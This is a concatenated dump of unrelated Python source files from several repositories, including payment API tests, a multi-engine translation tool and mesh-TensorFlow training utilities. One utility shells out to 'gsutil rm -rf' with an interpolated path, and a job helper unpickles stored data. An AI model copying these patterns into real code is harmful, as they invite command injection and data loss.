# ["/bin/bash", startupScript], cwd = path, env = env, preexec_fn=demoteUser(pw_record.pw_uid, pw_record.pw_gid)
["/bin/bash", startupScript], cwd = path
)
# TODO: At some point we should record process IDs for restarts/shutdowns/etc
#
# demoteUser
#
# Downgrade to execute the process using the specified user ID and group ID.
#
def demoteUser(user_uid, user_gid):
def result():
os.setgid(user_gid)
os.setuid(user_uid)
return result
#
# Main program
#
# Get the Web content directory, tack on "/s", and get a list of the
# contents of that directory
scriptDir = os.path.dirname(os.path.abspath(__file__))
if not scriptDir.endswith("/"):
scriptDir += "/"
serviceDir = scriptDir + "s"
serviceList = os.listdir(serviceDir)
# For each directory in the service directory,
# call startService() to start it up.
for name in serviceList:
if name[0] != '.':
path = serviceDir + "/" + name
if os.path.isdir(path):
startService(path)
|
tests/test_client_subscription.py | vivekhub/razorpay-python | 125 | 12691554 | <filename>tests/test_client_subscription.py
import responses
import json
from .helpers import mock_file, ClientTestCase
class TestClientSubscription(ClientTestCase):
def setUp(self):
super(TestClientSubscription, self).setUp()
self.base_url = '{}/subscriptions'.format(self.base_url)
self.subscription_id = 'sub_8RlLljfA4AnDVx'
@responses.activate
def test_subscription_fetch_all(self):
result = mock_file('subscription_collection')
url = self.base_url
responses.add(responses.GET, url, status=200,
body=json.dumps(result), match_querystring=True)
self.assertEqual(self.client.subscription.all(), result)
@responses.activate
def test_subscription_fetch(self):
result = mock_file('fake_subscription')
url = '{}/{}'.format(self.base_url, 'fake_subscription_id')
responses.add(responses.GET, url, status=200, body=json.dumps(result),
match_querystring=True)
self.assertEqual(
self.client.subscription.fetch('fake_subscription_id'),
result)
@responses.activate
def test_subscription_create(self):
init = mock_file('init_subscription')
result = mock_file('fake_subscription')
url = self.base_url
responses.add(responses.POST, url, status=200, body=json.dumps(result),
match_querystring=True)
self.assertEqual(self.client.subscription.create(init), result)
@responses.activate
def test_subscription_cancel(self):
result = mock_file('fake_subscription_cancelled')
url = '{}/{}/cancel'.format(self.base_url, self.subscription_id)
responses.add(responses.POST, url, status=200, body=json.dumps(result),
match_querystring=True)
response = json.loads(
self.client.subscription.cancel(self.subscription_id))
self.assertEqual(response['id'], self.subscription_id)
self.assertEqual(response['entity'], 'subscription')
self.assertEqual(response['status'], 'cancelled')
@responses.activate
def test_subscription_create_addon(self):
result = mock_file('fake_subscription_addon')
url = '{}/{}/addons'.format(self.base_url, self.subscription_id)
responses.add(responses.POST,
url,
status=200,
body=json.dumps(result),
match_querystring=True)
response = json.loads(
self.client.subscription.createAddon(
self.subscription_id,
{'item': {'name': 'Extra Chair', 'amount': 30000,
'currency': 'INR'}, 'quantity': 2}))
self.assertEqual(response['subscription_id'], self.subscription_id)
self.assertEqual(response['entity'], 'addon')
self.assertEqual(response['item']['name'], 'Extra Chair')
self.assertEqual(response['item']['amount'], 30000)
|
plenario/api/jobs.py | vforgione/plenario | 109 | 12691568 | <reponame>vforgione/plenario
import pickle
from flask import jsonify
from plenario.database import postgres_base, postgres_engine as engine
from plenario.utils.helpers import reflect
def get_job(ticket: str):
celery_taskmeta = reflect('celery_taskmeta', postgres_base.metadata, engine)
query = celery_taskmeta.select().where(celery_taskmeta.c.task_id == ticket)
job_meta = dict(query.execute().first().items())
job_meta['result'] = pickle.loads(job_meta['result'])
return job_meta
def make_job_response(endpoint, validated_query):
msg = 'This feature, enabled by the jobs=true flag, is currently ' \
'undergoing maintenance, we apologize for any inconvenience.'
return jsonify({'unavailable': msg})
|
maggot/config.py | ex4sperans/mag | 107 | 12691599 | from collections import OrderedDict
from maggot import get_current_separator
from maggot.containers import NestedContainer
class Config(NestedContainer):
@property
def identifier(self):
"""
Maps config parameters into a single string that shortly
summarrizes the content of config`s fields. Fields a sorted
to provide deterministic output.
Example:
>>> config = dict(a=10, b=dict(c=20))
>>> config = Config.from_dict(config)
>>> config.identifier
'10-20'
"""
parameters = self.as_flat_dict()
def sort_key(item):
name, attr = item
*prefix, base = name.split(".")
return base
def is_descriptive(key):
*prefix, base = key.split(".")
return not base.startswith("_")
# convert values to strings
parameters = OrderedDict((k, value_to_string(v, k))
for k, v in parameters.items())
# discard parameters that start with underscore
# by convention, they are considered as `non-descriptive`
# i.e. not used in the identifier
parameters = OrderedDict((k, v) for k, v in parameters.items()
if is_descriptive(k))
return get_current_separator().join(parameters.values())
def value_to_string(value, name):
"""Translates values (e.g. lists, ints, booleans) to strings"""
def last(name):
*prefix, base = name.split(".")
return base
if isinstance(value, list):
return "x".join(map(str, value))
if isinstance(value, bool):
return last(name) if value else "no_" + last(name)
else:
return str(value) |
scripts/configure-file.py | kasymovga/taisei | 573 | 12691606 | #!/usr/bin/env python3
import taiseilib.common
import taiseilib.configure
taiseilib.common.run_main(taiseilib.configure.main)
|
psonic/effects.py | m-roberts/python-sonic | 263 | 12691612 | <reponame>m-roberts/python-sonic
"""Effects"""
class FxName:
"""FX name"""
def __init__(self, name):
self.name = name
BITCRUSHER = FxName('bitcrusher')
COMPRESSOR = FxName('compressor')
ECHO = FxName('echo')
FLANGER = FxName('flanger')
KRUSH = FxName('krush')
LPF = FxName('lpf')
PAN = FxName('pan')
PANSLICER = FxName('panslicer')
REVERB = FxName('reverb')
SLICER = FxName('slicer')
WOBBLE = FxName('wobble')
|
lib/translator.py | damonchen/vim | 699 | 12691629 | <filename>lib/translator.py
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#======================================================================
#
# translator.py - 命令行翻译(谷歌,必应,百度,有道,词霸)
#
# Created by skywind on 2019/06/14
# Version: 1.0.2, Last Modified: 2019/06/18 18:40
#
#======================================================================
from __future__ import print_function, unicode_literals
import sys
import time
import os
import re
import random
import copy
import json
import codecs
import pprint
#----------------------------------------------------------------------
# 编码兼容
#----------------------------------------------------------------------
if sys.version_info[0] < 3:
reload(sys) # noqa: F821
sys.setdefaultencoding('utf-8')
# sys.stdout = codecs.getwriter('utf-8')(sys.stdout, 'ignore')
# sys.stderr = codecs.getwriter('utf-8')(sys.stderr, 'ignore')
else:
# sys.stdout = codecs.getwriter('utf-8')(sys.stdout.buffer, 'ignore')
# sys.stderr = codecs.getwriter('utf-8')(sys.stderr.buffer, 'ignore')
pass
#----------------------------------------------------------------------
# 语言的别名
#----------------------------------------------------------------------
langmap = {
"arabic": "ar",
"bulgarian": "bg",
"catalan": "ca",
"chinese": "zh-CN",
"chinese simplified": "zh-CHS",
"chinese traditional": "zh-CHT",
"czech": "cs",
"danish": "da",
"dutch": "nl",
"english": "en",
"estonian": "et",
"finnish": "fi",
"french": "fr",
"german": "de",
"greek": "el",
"haitian creole": "ht",
"hebrew": "he",
"hindi": "hi",
"hmong daw": "mww",
"hungarian": "hu",
"indonesian": "id",
"italian": "it",
"japanese": "ja",
"klingon": "tlh",
"klingon (piqad)":"tlh-Qaak",
"korean": "ko",
"latvian": "lv",
"lithuanian": "lt",
"malay": "ms",
"maltese": "mt",
"norwegian": "no",
"persian": "fa",
"polish": "pl",
"portuguese": "pt",
"romanian": "ro",
"russian": "ru",
"slovak": "sk",
"slovenian": "sl",
"spanish": "es",
"swedish": "sv",
"thai": "th",
"turkish": "tr",
"ukrainian": "uk",
"urdu": "ur",
"vietnamese": "vi",
"welsh": "cy"
}
#----------------------------------------------------------------------
# BasicTranslator
#----------------------------------------------------------------------
class BasicTranslator(object):
def __init__ (self, name, **argv):
self._name = name
self._config = {}
self._options = argv
self._session = None
self._agent = None
self._load_config(name)
self._check_proxy()
def __load_ini (self, ininame, codec = None):
config = {}
if not ininame:
return None
elif not os.path.exists(ininame):
return None
try:
content = open(ininame, 'rb').read()
except IOError:
content = b''
if content[:3] == b'\xef\xbb\xbf':
text = content[3:].decode('utf-8')
elif codec is not None:
text = content.decode(codec, 'ignore')
else:
codec = sys.getdefaultencoding()
text = None
for name in [codec, 'gbk', 'utf-8']:
try:
text = content.decode(name)
break
except:
pass
if text is None:
text = content.decode('utf-8', 'ignore')
if sys.version_info[0] < 3:
import StringIO
import ConfigParser
sio = StringIO.StringIO(text)
cp = ConfigParser.ConfigParser()
cp.readfp(sio)
else:
import configparser
cp = configparser.ConfigParser(interpolation = None)
cp.read_string(text)
for sect in cp.sections():
for key, val in cp.items(sect):
lowsect, lowkey = sect.lower(), key.lower()
config.setdefault(lowsect, {})[lowkey] = val
if 'default' not in config:
config['default'] = {}
return config
def _load_config (self, name):
self._config = {}
ininame = os.path.expanduser('~/.config/translator/config.ini')
config = self.__load_ini(ininame)
if not config:
return False
for section in ('default', name):
items = config.get(section, {})
for key in items:
self._config[key] = items[key]
return True
def _check_proxy (self):
proxy = os.environ.get('all_proxy', None)
if not proxy:
return False
if not isinstance(proxy, str):
return False
if 'proxy' not in self._config:
self._config['proxy'] = proxy.strip()
return True
def request (self, url, data = None, post = False, header = None):
import requests
if not self._session:
self._session = requests.Session()
argv = {}
if header is not None:
header = copy.deepcopy(header)
else:
header = {}
if self._agent:
header['User-Agent'] = self._agent
argv['headers'] = header
timeout = self._config.get('timeout', 7)
proxy = self._config.get('proxy', None)
if timeout:
argv['timeout'] = float(timeout)
if proxy:
proxies = {'http': proxy, 'https': proxy}
argv['proxies'] = proxies
if not post:
if data is not None:
argv['params'] = data
else:
if data is not None:
argv['data'] = data
if not post:
r = self._session.get(url, **argv)
else:
r = self._session.post(url, **argv)
return r
def http_get (self, url, data = None, header = None):
return self.request(url, data, False, header)
def http_post (self, url, data = None, header = None):
return self.request(url, data, True, header)
def url_unquote (self, text, plus = True):
if sys.version_info[0] < 3:
import urllib
if plus:
return urllib.unquote_plus(text)
return urllib.unquote(text)
import urllib.parse
if plus:
return urllib.parse.unquote_plus(text)
return urllib.parse.unquote(text)
def url_quote (self, text, plus = True):
if sys.version_info[0] < 3:
import urllib
if isinstance(text, unicode): # noqa: F821
text = text.encode('utf-8', 'ignore')
if plus:
return urllib.quote_plus(text)
return urlparse.quote(text) # noqa: F821
import urllib.parse
if plus:
return urllib.parse.quote_plus(text)
return urllib.parse.quote(text)
def create_translation (self, sl = None, tl = None, text = None):
res = {}
res['engine'] = self._name
res['sl'] = sl # 来源语言
res['tl'] = tl # 目标语言
res['text'] = text # 需要翻译的文本
res['phonetic'] = None # 音标
res['definition'] = None # 简单释义
res['explain'] = None # 分行解释
return res
# 翻译结果:需要填充如下字段
def translate (self, sl, tl, text):
return self.create_translation(sl, tl, text)
# 是否是英文
def check_english (self, text):
for ch in text:
if ord(ch) >= 128:
return False
return True
# 猜测语言
def guess_language (self, sl, tl, text):
if ((not sl) or sl == 'auto') and ((not tl) or tl == 'auto'):
if self.check_english(text):
sl, tl = ('en-US', 'zh-CN')
else:
sl, tl = ('zh-CN', 'en-US')
if sl.lower() in langmap:
sl = langmap[sl.lower()]
if tl.lower() in langmap:
tl = langmap[tl.lower()]
return sl, tl
def md5sum (self, text):
import hashlib
m = hashlib.md5()
if sys.version_info[0] < 3:
if isinstance(text, unicode): # noqa: F821
text = text.encode('utf-8')
else:
if isinstance(text, str):
text = text.encode('utf-8')
m.update(text)
return m.hexdigest()
#----------------------------------------------------------------------
# Azure Translator
#----------------------------------------------------------------------
class AzureTranslator (BasicTranslator):
def __init__ (self, **argv):
super(AzureTranslator, self).__init__('azure', **argv)
if 'apikey' not in self._config:
sys.stderr.write('error: missing apikey in [azure] section\n')
sys.exit()
self.apikey = self._config['apikey']
def translate (self, sl, tl, text):
import uuid
sl, tl = self.guess_language(sl, tl, text)
qs = self.url_quote(sl)
qt = self.url_quote(tl)
url = 'https://api.cognitive.microsofttranslator.com/translate'
url += '?api-version=3.0&from={}&to={}'.format(qs, qt)
headers = {
'Ocp-Apim-Subscription-Key': self.apikey,
'Content-type': 'application/json',
'X-ClientTraceId': str(uuid.uuid4())
}
body = [{'text': text}]
import json
resp = self.http_post(url, json.dumps(body), headers).json()
# print(resp)
res = {}
res['text'] = text
res['sl'] = sl
res['tl'] = tl
res['translation'] = self.render(resp)
res['html'] = None
res['xterm'] = None
return res
def render (self, resp):
if not resp:
return ''
x = resp[0]
if not x:
return ''
y = x['translations']
if not y:
return ''
output = ''
for item in y:
output += item['text'] + '\n'
return output
#----------------------------------------------------------------------
# Google Translator
#----------------------------------------------------------------------
class GoogleTranslator (BasicTranslator):
def __init__ (self, **argv):
super(GoogleTranslator, self).__init__('google', **argv)
self._agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0)'
self._agent += ' Gecko/20100101 Firefox/59.0'
def get_url (self, sl, tl, qry):
http_host = self._config.get('host', 'translate.googleapis.com')
qry = self.url_quote(qry)
url = 'https://{}/translate_a/single?client=gtx&sl={}&tl={}&dt=at&dt=bd&dt=ex&' \
'dt=ld&dt=md&dt=qca&dt=rw&dt=rm&dt=ss&dt=t&q={}'.format(
http_host, sl, tl, qry) # noqa: E216
return url
def translate (self, sl, tl, text):
sl, tl = self.guess_language(sl, tl, text)
self.text = text
url = self.get_url(sl, tl, text)
r = self.http_get(url)
if not r:
return None
try:
obj = r.json()
except:
return None
# pprint.pprint(obj)
res = self.create_translation(sl, tl, text)
res['phonetic'] = self.get_phonetic(obj)
res['definition'] = self.get_definition(obj)
res['explain'] = self.get_explain(obj)
res['detail'] = self.get_detail(obj)
res['alternative'] = self.get_alternative(obj)
return res
def get_phonetic (self, obj):
for x in obj[0]:
if len(x) == 4:
return x[3]
return None
def get_definition (self, obj):
paraphrase = ''
for x in obj[0]:
if x[0]:
paraphrase += x[0]
return paraphrase
def get_explain (self, obj):
explain = []
if obj[1]:
for x in obj[1]:
expl = '[{}] '.format(x[0][0])
for i in x[2]:
expl += i[0] + ';'
explain.append(expl)
return explain
def get_detail (self, resp):
result = []
if len(resp) < 13:
return None
for x in resp[12]:
result.append('[{}]'.format(x[0]))
for y in x[1]:
result.append('- {}'.format(y[0]))
if len(y) >= 3:
result.append(' * {}'.format(y[2]))
return result
def get_alternative (self, resp):
definition = self.get_definition(resp)
result = []
if len(resp) < 6:
return None
for x in resp[5]:
# result.append('- {}'.format(x[0]))
for i in x[2]:
if i[0] != definition:
result.append(' * {}'.format(i[0]))
return result
#----------------------------------------------------------------------
# Youdao Translator
#----------------------------------------------------------------------
class YoudaoTranslator (BasicTranslator):
def __init__ (self, **argv):
super(YoudaoTranslator, self).__init__('youdao', **argv)
self.url = 'https://fanyi.youdao.com/translate_o?smartresult=dict&smartresult=rule'
self.D = "ebSeFb%=XZ%T[KZ)c(sy!"
self.D = "97_3(jkMYg@T[KZQmqjTK"
def get_md5 (self, value):
import hashlib
m = hashlib.md5()
# m.update(value)
m.update(value.encode('utf-8'))
return m.hexdigest()
def sign (self, text, salt):
s = "fanyideskweb" + text + salt + self.D
return self.get_md5(s)
def translate (self, sl, tl, text):
sl, tl = self.guess_language(sl, tl, text)
self.text = text
salt = str(int(time.time() * 1000) + random.randint(0, 10))
sign = self.sign(text, salt)
header = {
'Cookie': '[email protected];',
'Referer': 'http://fanyi.youdao.com/',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:51.0) Gecko/20100101 Firefox/51.0',
}
data = {
'i': text,
'from': sl,
'to': tl,
'smartresult': 'dict',
'client': 'fanyideskweb',
'salt': salt,
'sign': sign,
'doctype': 'json',
'version': '2.1',
'keyfrom': 'fanyi.web',
'action': 'FY_BY_CL1CKBUTTON',
'typoResult': 'true'
}
r = self.http_post(self.url, data, header)
if not r:
return None
try:
obj = r.json()
except:
return None
# pprint.pprint(obj)
res = self.create_translation(sl, tl, text)
res['definition'] = self.get_definition(obj)
res['explain'] = self.get_explain(obj)
return res
def get_definition (self, obj):
translation = ''
t = obj.get('translateResult')
if t:
for n in t:
part = []
for m in n:
x = m.get('tgt')
if x:
part.append(x)
if part:
translation += ', '.join(part)
return translation
def get_explain (self, obj):
explain = []
if 'smartResult' in obj:
smarts = obj['smartResult']['entries']
for entry in smarts:
if entry:
entry = entry.replace('\r', '')
entry = entry.replace('\n', '')
explain.append(entry)
return explain
#----------------------------------------------------------------------
# Bing2: 免费 web 接口,只能查单词
#----------------------------------------------------------------------
class BingDict (BasicTranslator):
def __init__ (self, **argv):
super(BingDict, self).__init__('bingdict', **argv)
self._agent = 'Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101'
self._agent += ' Firefox/50.0'
self._url = 'http://bing.com/dict/SerpHoverTrans'
self._cnurl = 'http://cn.bing.com/dict/SerpHoverTrans'
def translate (self, sl, tl, text):
url = ('zh' in tl) and self._cnurl or self._url
url = self._cnurl
url = url + '?q=' + self.url_quote(text)
headers = {
# 'Host': 'cn.bing.com',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
}
resp = self.http_get(url, None, headers)
if not resp:
return None
resp = resp.text
res = self.create_translation(sl, tl, text)
res['sl'] = 'auto'
res['tl'] = 'auto'
res['text'] = text
res['phonetic'] = self.get_phonetic(resp)
res['explain'] = self.get_explain(resp)
return res
def get_phonetic (self, html):
if not html:
return ''
m = re.findall(
r'<span class="ht_attr" lang=".*?">\[(.*?)\] </span>', html)
if not m:
return None
return m[0].strip()
def get_explain (self, html):
if not html:
return []
m = re.findall(
r'<span class="ht_pos">(.*?)</span><span class="ht_trs">(.*?)</span>', html)
expls = []
for item in m:
expls.append('%s %s' % item)
return expls
#----------------------------------------------------------------------
# Baidu Translator
#----------------------------------------------------------------------
class BaiduTranslator (BasicTranslator):
def __init__ (self, **argv):
super(BaiduTranslator, self).__init__('baidu', **argv)
if 'apikey' not in self._config:
sys.stderr.write('error: missing apikey in [baidu] section\n')
sys.exit()
if 'secret' not in self._config:
sys.stderr.write('error: missing secret in [baidu] section\n')
sys.exit()
self.apikey = self._config['apikey']
self.secret = self._config['secret']
langmap = {
'zh-cn': 'zh',
'zh-chs': 'zh',
'zh-cht': 'cht',
'en-us': 'en',
'en-gb': 'en',
'ja': 'jp',
}
self.langmap = langmap
def convert_lang (self, lang):
t = lang.lower()
if t in self.langmap:
return self.langmap[t]
return lang
def translate (self, sl, tl, text):
sl, tl = self.guess_language(sl, tl, text)
req = {}
req['q'] = text
req['from'] = self.convert_lang(sl)
req['to'] = self.convert_lang(tl)
req['appid'] = self.apikey
req['salt'] = str(int(time.time() * 1000) + random.randint(0, 10))
req['sign'] = self.sign(text, req['salt'])
url = "https://fanyi-api.baidu.com/api/trans/vip/translate"
r = self.http_post(url, req)
resp = r.json()
res = {}
res['text'] = text
res['sl'] = sl
res['tl'] = tl
res['info'] = resp
res['translation'] = self.render(resp)
res['html'] = None
res['xterm'] = None
return res
def sign (self, text, salt):
t = self.apikey + text + salt + self.secret
return self.md5sum(t)
def render (self, resp):
output = ''
result = resp['trans_result']
for item in result:
output += '' + item['src'] + '\n'
output += ' * ' + item['dst'] + '\n'
return output
#----------------------------------------------------------------------
# 词霸
#----------------------------------------------------------------------
class CibaTranslator (BasicTranslator):
def __init__ (self, **argv):
super(CibaTranslator, self).__init__('ciba', **argv)
def translate (self, sl, tl, text):
sl, tl = self.guess_language(sl, tl, text)
url = 'https://fy.iciba.com/ajax.php'
req = {}
req['a'] = 'fy'
req['f'] = sl
req['t'] = tl
req['w'] = text
r = self.http_get(url, req, None)
if not r:
return None
try:
resp = r.json()
except:
return None
resp = r.json()
if not resp:
return None
res = self.create_translation(sl, tl, text)
res['definition'] = ''
if 'content' in resp:
if 'out' in resp['content']:
res['definition'] = resp['content']['out'] or ''
if 'ph_en' in resp['content']:
res['phonetic'] = resp['content']['ph_en'] or ''
if 'word_mean' in resp['content']:
res['explain'] = resp['content']['word_mean'] or ''
return res
#----------------------------------------------------------------------
# 分析命令行参数
#----------------------------------------------------------------------
def getopt (argv):
args = []
options = {}
if argv is None:
argv = sys.argv[1:]
index = 0
count = len(argv)
while index < count:
arg = argv[index]
if arg != '':
head = arg[:1]
if head != '-':
break
if arg == '-':
break
name = arg.lstrip('-')
key, _, val = name.partition('=')
options[key.strip()] = val.strip()
index += 1
while index < count:
args.append(argv[index])
index += 1
return options, args
#----------------------------------------------------------------------
# 引擎注册
#----------------------------------------------------------------------
ENGINES = {
'google': GoogleTranslator,
'azure': AzureTranslator,
'baidu': BaiduTranslator,
'youdao': YoudaoTranslator,
'bing': BingDict,
'ciba': CibaTranslator,
}
#----------------------------------------------------------------------
# 主程序
#----------------------------------------------------------------------
def main(argv = None):
if argv is None:
argv = sys.argv
argv = [ n for n in argv ]
options, args = getopt(argv[1:])
engine = options.get('engine')
if not engine:
engine = 'google'
sl = options.get('from')
if not sl:
sl = 'auto'
tl = options.get('to')
if not tl:
tl = 'auto'
if not args:
msg = 'usage: translator.py {--engine=xx} {--from=xx} {--to=xx}'
print(msg + ' {-json} text')
print('engines:', list(ENGINES.keys()))
return 0
text = ' '.join(args)
cls = ENGINES.get(engine)
if not cls:
print('bad engine name: ' + engine)
return -1
translator = cls()
res = translator.translate(sl, tl, text)
if 'json' in options:
text = json.dumps(res)
sys.stdout.write(str(text))
return 0
if not res:
return -2
if 'text' in res:
if res['text']:
print(res['text'])
if 'phonetic' in res:
if res['phonetic'] and ('phonetic' in options):
print('[' + res['phonetic'] + ']')
if 'definition' in res:
if res['definition']:
print(res['definition'])
if 'explain' in res:
if res['explain']:
print('\n'.join(res['explain']))
elif 'translation' in res:
if res['translation']:
print(res['translation'])
if 'alternative' in res:
if res['alternative']:
print('\n'.join(res['alternative']))
return 0
#----------------------------------------------------------------------
# 有待尝试的新接口
#----------------------------------------------------------------------
'''
http://dict.youdao.com/fsearch?client=deskdict&keyfrom=chrome.extension&q=a%20day&pos=-1&doctype=xml&xmlVersion=3.2&dogVersion=1.0&vendor=unknown&appVer=3.1.17.4208
'''
#----------------------------------------------------------------------
# testing suit
#----------------------------------------------------------------------
if __name__ == '__main__':
def test1():
bt = BasicTranslator('test')
r = bt.request("http://www.baidu.com")
print(r.text)
return 0
def test2():
gt = GoogleTranslator()
# r = gt.translate('auto', 'auto', 'Hello, World !!')
# r = gt.translate('auto', 'auto', '你吃饭了没有?')
# r = gt.translate('auto', 'auto', '长')
r = gt.translate('auto', 'auto', 'long')
# r = gt.translate('auto', 'auto', 'kiss')
# r = gt.translate('auto', 'auto', '亲吻')
import pprint
print(r['translation'])
# pprint.pprint(r['info'])
return 0
def test3():
t = YoudaoTranslator()
r = t.translate('auto', 'auto', 'kiss')
import pprint
pprint.pprint(r)
print(r['translation'])
return 0
def test4():
t = AzureTranslator()
r = t.translate('', 'japanese', '吃饭没有?')
# print(r['info'])
# print()
print(r['translation'])
def test5():
t = BaiduTranslator()
r = t.translate('', '', '吃饭了没有?')
import pprint
pprint.pprint(r)
print(r['translation'])
return 0
def test6():
t = CibaTranslator()
r = t.translate('', '', '吃饭没有?')
# print(r['info'])
# print()
print(r['translation'])
def test7():
# t = CibaTranslator()
t = GoogleTranslator()
# t = YoudaoTranslator()
# t = BingDict()
# r = t.translate('zh', 'en', '吃饭了没有?')
# r = t.translate('', '', 'apple')
r = t.translate('', '', '正在测试翻译一段话')
pprint.pprint(r)
def test9():
argv = ['', '正在测试翻译一段话']
main(argv)
print('=====')
argv = ['', '--engine=bing', '--sl=zh', '--tl=en', '正在测试翻译一段话']
main(argv)
print('=====')
argv = ['', '--engine=bing', '--sl=zh', '--tl=en', '-json', '苹果']
main(argv)
return 0
# test9()
main()
|
Data/Algorithm/Python/bubbleSort.py | jecqiang/PHPer | 376 | 12691638 | def bubble_sort(arry):
n = len(arry) #获得数组的长度
for i in range(n):
for j in range(1,n-i):
if arry[j-1] > arry[j] : #如果前者比后者大
arry[j-1],arry[j] = arry[j],arry[j-1] #则交换两者
return arry
|
dev/Gems/CloudGemFramework/v1/AWS/common-code/Utils/test/test_unit_aws_sts.py | BadDevCode/lumberyard | 1,738 | 12691644 | #
# All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
# its licensors.
#
# For complete copyright and license terms please see the LICENSE at the root of this
# distribution (the "License"). All use of this software is governed by the License,
# or, if provided, by the license below or the license accompanying this file. Do not
# remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
import unittest
from unittest import mock
from unittest.mock import MagicMock
from cgf_utils.aws_sts import AWSSTSUtils
class UnitTest_AWSSTSUtils(unittest.TestCase):
TEST_REGION = "test-region"
TOKEN_FROM_REGIONAL = "<PASSWORD>" # random string
TOKEN_FROM_GLOBAL = "F" + TOKEN_FROM_REGIONAL
MOCK_SESSION = MagicMock()
MOCK_SESSION.client.return_value = MagicMock()
def test_endpoint_construction(self):
aws_sts = AWSSTSUtils(self.TEST_REGION)
self.assertTrue(self.TEST_REGION in aws_sts.endpoint_url)
def test_client_construction_with_session(self):
aws_sts = AWSSTSUtils(self.TEST_REGION)
client = aws_sts.client(self.MOCK_SESSION)
self.assertIsNotNone(client)
self.MOCK_SESSION.client.assert_called_once_with('sts', endpoint_url=aws_sts.endpoint_url)
@mock.patch("boto3.client")
def test_client_construction(self, mock_boto_sts_client):
aws_sts = AWSSTSUtils(self.TEST_REGION)
client = aws_sts.client()
self.assertIsNotNone(client)
mock_boto_sts_client.assert_called_once_with('sts', endpoint_url=aws_sts.endpoint_url, region_name=self.TEST_REGION)
@mock.patch("boto3.Session")
def test_client_construction_with_credentials(self, mock_get_session):
mock_session = mock.Mock()
mock_session.client.return_value = MagicMock()
mock_get_session.return_value = mock_session
aws_sts = AWSSTSUtils(self.TEST_REGION)
client = aws_sts.client_with_credentials(aws_access_key_id="ACCESS_KEY_ID",
aws_secret_access_key="SECRET_ACCESS_KEY",
aws_session_token="<PASSWORD>")
self.assertIsNotNone(client)
mock_get_session.assert_called_once_with(aws_access_key_id="ACCESS_KEY_ID",
aws_secret_access_key="SECRET_ACCESS_KEY",
aws_session_token="<PASSWORD>",
region_name=self.TEST_REGION)
mock_session.client.assert_called_once_with('sts', endpoint_url=aws_sts.endpoint_url)
def test_session_token_validation(self):
# No exception when calling
AWSSTSUtils.validate_session_token(self.TOKEN_FROM_REGIONAL)
# Expect exception when calling
with self.assertRaises(RuntimeError):
AWSSTSUtils.validate_session_token(self.TOKEN_FROM_GLOBAL)
|
src/utils/utils.py | TheodoreGalanos/DALLE-mtf | 385 | 12691648 | <reponame>TheodoreGalanos/DALLE-mtf
import json
from collections import defaultdict
from urllib.parse import urlparse
from shutil import rmtree
import os
import tensorflow.compat.v1 as tf
import tensorflow.compat.v2 as tf2
import mesh_tensorflow as mtf
import logging
import sys
from mesh_tensorflow.ops import Operation, Tensor
def fetch_model_params(model):
model_path = model if model.endswith(".json") else f"./configs/{model}.json"
with open(model_path) as f:
params = json.load(f)
return defaultdict(lambda: None, params)
def yes_or_no(question):
while True:
reply = str(input(question + ' (y/n): ')).lower().strip()
if reply[:1] == 'y':
return True
if reply[:1] == 'n':
return False
def mode_to_str(mode):
if mode == tf.estimator.ModeKeys.PREDICT:
return "predict"
elif mode == tf.estimator.ModeKeys.EVAL:
return "eval"
elif mode == tf.estimator.ModeKeys.TRAIN:
return "train"
else:
raise ValueError(f"Invalid mode {mode}")
def remove_gs_or_filepath(path):
parsed_url = urlparse(path)
if parsed_url.scheme == "gs":
os.system(f"gsutil rm -rf {path}")
return
rmtree(path)
def maybe_remove_gs_or_filepath(path):
if yes_or_no(f"Are you sure you want to remove '{path}' to start afresh?"):
remove_gs_or_filepath(path)
else:
exit()
def get_n_trainable_vars(graph):
"""
Gets number of trainable vars in a MTF model.
:param graph: Mesh-Tensorflow graph
:return: None
"""
total_parameters = 0
for variable in graph.trainable_variables:
shape = variable.shape.dims
variable_parameters = 1
for dim in shape:
variable_parameters *= dim.size
total_parameters += variable_parameters
print(f"\n\nN PARAMS:\n{total_parameters:,}\n\n")
def print_dim_names(graph):
"""
Print names of all Dimensions
:param graph: Mesh-Tensorflow graph
:return: None
"""
all_dim_names = []
for variable in graph.all_variables:
names = variable.shape.dimension_names
all_dim_names.append(names)
# Print all dim names in graph & write to file
all_dim_names = [item for sublist in all_dim_names for item in sublist] # Flatten all dims
unique_dims = list(set(all_dim_names))
print("ALL DIM NAMES:")
for dim_name in unique_dims:
print(dim_name)
print('\n')
def get_graph_info(graph):
"""
Wrapper fn that calculates number of trainable vars in an MTF graph & prints all dim_names to file
:param graph: Mesh-Tensorflow graph
:return: None
"""
get_n_trainable_vars(graph)
print_dim_names(graph)
def create_host_call(model_dir):
"""Construct a host_call writing scalar summaries.
Borrowed from t2t.
Args:
model_dir: String containing path to train
Returns:
(fn, args) Pair to be called by TPUEstimator as the host_call.
"""
graph = tf.get_default_graph()
# A list of (name, lowered tensor) tuples
summaries = graph.get_collection(mtf.utils.SCALAR_SUMMARIES_COLLECTION_KEY)
def maybe_cast(tensor):
# assert tensor.shape.is_compatible_with([]), tensor.name
if tensor.dtype == tf.int64:
return tf.to_int32(tensor)
if tensor.dtype == tf.bfloat16:
return tf.cast(tensor, tf.float32)
return tensor
reshaped_tensors = []
for _, t in summaries:
try:
t = tf.reshape(maybe_cast(t), [1])
except:
pass
reshaped_tensors.append(t)
# When no supported summaries are found, don't create host_call. Otherwise,
# TPU outfeed queue would enqueue global_step while host_call doesn't dequeue
# it, eventually causing hang.
if not reshaped_tensors:
return None
def host_call_fn(global_step, *args):
"""Training host call. Creates scalar summaries for training metrics."""
# This function is executed on the CPU and should not directly reference
# any Tensors in the rest of the `model_fn`. To pass Tensors from the
# model to the `model_fn`, provide as part of the `host_call`.
global_step = tf.cast(global_step[0], tf.int64)
with tf2.summary.create_file_writer(model_dir).as_default():
# We cannot directly use any tensor from summaries, because each
# tensor here must be a concat of multiple tensors from all shards.
# Therefore, we rely on the assumption that args wil have the same
# length as summaries, and all tensors in args will have the same
# order of self._tup_summaries.
assert len(args) == len(summaries)
for i, tensor in enumerate(args):
name = summaries[i][0]
if not "image" in name:
